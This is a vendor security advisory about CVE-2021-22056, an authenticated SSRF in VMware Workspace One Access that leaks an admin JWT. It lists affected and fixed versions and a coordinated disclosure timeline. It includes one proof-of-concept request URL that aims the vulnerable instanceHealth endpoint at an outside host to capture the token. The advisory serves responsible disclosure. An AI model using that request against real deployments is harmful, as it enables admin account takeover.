Advisory: VMWare Workspace One Access (CVE-2021-22056)

Jan 17, 2022


When authenticated as an administrator user inside VMWare Workspace One Access, it is possible to send HTTP requests to arbitrary URLs and read the full HTTP response for these requests. When the HTTP requests are being made, an authentication header (Authorization) is sent, which includes an admin-level JWT.


Due to the lack of a slash character, it is possible for an attacker to make HTTP requests to arbitrary origins and read the full response. Furthermore, an authorization header gets leaked and hence it is possible for an attacker to weaponize this vulnerability to steal the authorization header of an admin upon viewing an image or making a single click.

Version Tested Against

identity-manager- - 20.01

Admin token disclosure affects 20.01, but not later versions.

Later versions are still vulnerable to the SSRF vulnerability.

Product Description

Workspace ONE Access, (formerly VMware Identity Manager), provides multi-factor authentication, conditional access and single sign-on to SaaS, web and native mobile apps.


VMWare’s advisory can be found here.

As per VMWare’s advisory, the following versions are considered fixed:

Fixed Version:

VMware Workspace ONE Access

VMware Workspace ONE Access 21.08,, 20.10


VMware Identity Manager (vIDM) 3.3.5, 3.3.4, 3.3.3


Mitre CVE Dictionary Links:


FIRST CVSSv3 Calculator:


https://access.reverse.test/SAAS/API/1.0/REST/system/health/instanceHealth?hostName=access.reverse.test&[email protected]

Blog Post

The blog post detailing the steps taken for the discovery of this vulnerability can be found here.


Assetnote Security Research Team and Keiran Sampson


The timeline for this disclosure process can be found below:

  • Oct 5th, 2021: Disclosure of account takeover via post auth SSRF
  • Oct 5th, 2021: Response from VMWare confirming receipt of vulnerability
  • Nov 9th, 2021: Assetnote Security Research team requests an update on the issue
  • Nov 12th, 2021: Response from VMWare confirming that vulnerability is being worked on
  • Dec 8th, 2021: Assetnote Security Research team requests an update on the issue
  • Dec 8th, 2021: Response from VMWare confirming they could reproduce SSRF but not admin token disclosure on latest version of Workspace One Access
  • Dec 10th, 2021: Response from VMWare confirming progress is being made on fixes
  • Dec 17th, 2021: VMWare publishes advisory

See Assetnote in action

Find out how Assetnote can help you lock down your external attack surface.

Use the lead form below, or alternatively contact us via email by clicking here.